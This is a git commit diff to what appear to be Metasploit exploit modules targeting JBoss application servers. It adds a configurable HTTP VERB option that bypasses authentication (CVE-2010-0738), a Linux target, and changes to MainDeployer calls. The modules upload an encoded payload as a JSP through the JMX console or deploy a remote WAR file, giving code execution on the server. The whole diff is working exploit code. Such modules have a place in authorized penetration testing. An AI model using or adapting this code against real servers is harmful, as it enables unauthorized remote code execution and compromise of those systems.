add VERB option to enable exploiting cve-2010-0738

git-svn-id: file:///home/svn/framework3/trunk@9282 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-05-11 09:14:36 +00:00
parent c0494dcbc0
commit 7f758d5a02
2 changed files with 23 additions and 9 deletions

View File

@ -32,6 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' => 'References' =>
[ [
[ 'CVE', '2006-5750' ], [ 'CVE', '2006-5750' ],
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
[ 'OSVDB', '30767'], [ 'OSVDB', '30767'],
[ 'BID', '21219' ] [ 'BID', '21219' ]
], ],
@ -57,7 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote
Opt::RPORT(8080), Opt::RPORT(8080),
OptString.new('SHELL', [ true, "The system shell to use.", '/bin/sh']), OptString.new('SHELL', [ true, "The system shell to use.", '/bin/sh']),
OptString.new('URI', [ true, "The URI to call the payload.", '/web-console/']), OptString.new('URI', [ true, "The URI to call the payload.", '/web-console/']),
OptString.new('PATH', [ true, "The URI to deploy the payload.", 'console-mgr.sar/web-console.war/']) OptString.new('PATH', [ true, "The URI to deploy the payload.", 'console-mgr.sar/web-console.war/']),
OptString.new('VERB', [ true, "The HTTP verb to use", "POST"]),
], self.class) ], self.class)
end end
@ -68,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => '/jmx-console/HtmlAdaptor', 'uri' => '/jmx-console/HtmlAdaptor',
'method' => 'POST', 'method' => datastore['VERB'],
'data' => 'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' + 'data' => 'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' +
Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' + Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
Rex::Text.uri_encode(payload.encoded) + '&arg4=True', Rex::Text.uri_encode(payload.encoded) + '&arg4=True',

View File

@ -34,11 +34,12 @@ class Metasploit3 < Msf::Exploit::Remote
'References' => 'References' =>
[ [
[ 'CVE', '2007-1036' ], [ 'CVE', '2007-1036' ],
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
[ 'OSVDB', '33744' ], [ 'OSVDB', '33744' ],
[ 'URL', 'http://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf' ] [ 'URL', 'http://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf' ]
], ],
'Privileged' => true, 'Privileged' => true,
'Platform' => [ 'win' ], # linux untested 'Platform' => [ 'win', 'linux' ], # linux untested
'Stance' => Msf::Exploit::Stance::Aggressive, 'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' => 'Targets' =>
[ [
@ -55,6 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_X86, 'Arch' => ARCH_X86,
'Platform' => 'win' 'Platform' => 'win'
}, },
],
[ 'Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
] ]
], ],
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
@ -64,7 +71,8 @@ class Metasploit3 < Msf::Exploit::Remote
Opt::RPORT(8080), Opt::RPORT(8080),
OptString.new('USERNAME', [ false, 'The username to authenticate as' ]), OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
OptString.new('PASSWORD', [ false, 'The password for the specified username' ]), OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
OptString.new('PATH', [ true, "The URI path of the console", '/jmx-console']) OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console']),
OptString.new('VERB', [ true, 'The HTTP verb to use', 'POST']),
], self.class) ], self.class)
end end
@ -140,15 +148,19 @@ class Metasploit3 < Msf::Exploit::Remote
}, },
'Path' => resource_uri 'Path' => resource_uri
}}) }})
print_status("Making the request to the MainDeployer...") print_status("Making the request to the MainDeployer...")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => datastore['VERB'],
'uri' => datastore['PATH'] + '/HtmlAdaptor', 'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_post' => 'vars_post' =>
{ {
'action' => 'invokeOp', 'action' => 'invokeOp',
'name' => 'jboss.system:service=MainDeployer', 'name' => 'jboss.system:service=MainDeployer',
'methodIndex' => '21', # deploy via java.net.URL # deploy via java.net.URL
'methodIndex' => '3', # jboss 4.0.5
#'methodIndex' => '21', # jboss 3.0.8
#'methodIndex' => '23', # jboss 3.2.7
'arg0' => service_url 'arg0' => service_url
} }
}, 20) }, 20)
@ -199,7 +211,7 @@ class Metasploit3 < Msf::Exploit::Remote
# #
print_status("Undeploying #{app_base} ...") print_status("Undeploying #{app_base} ...")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => datastore['VERB'],
'uri' => datastore['PATH'] + '/HtmlAdaptor', 'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_post' => 'vars_post' =>
{ {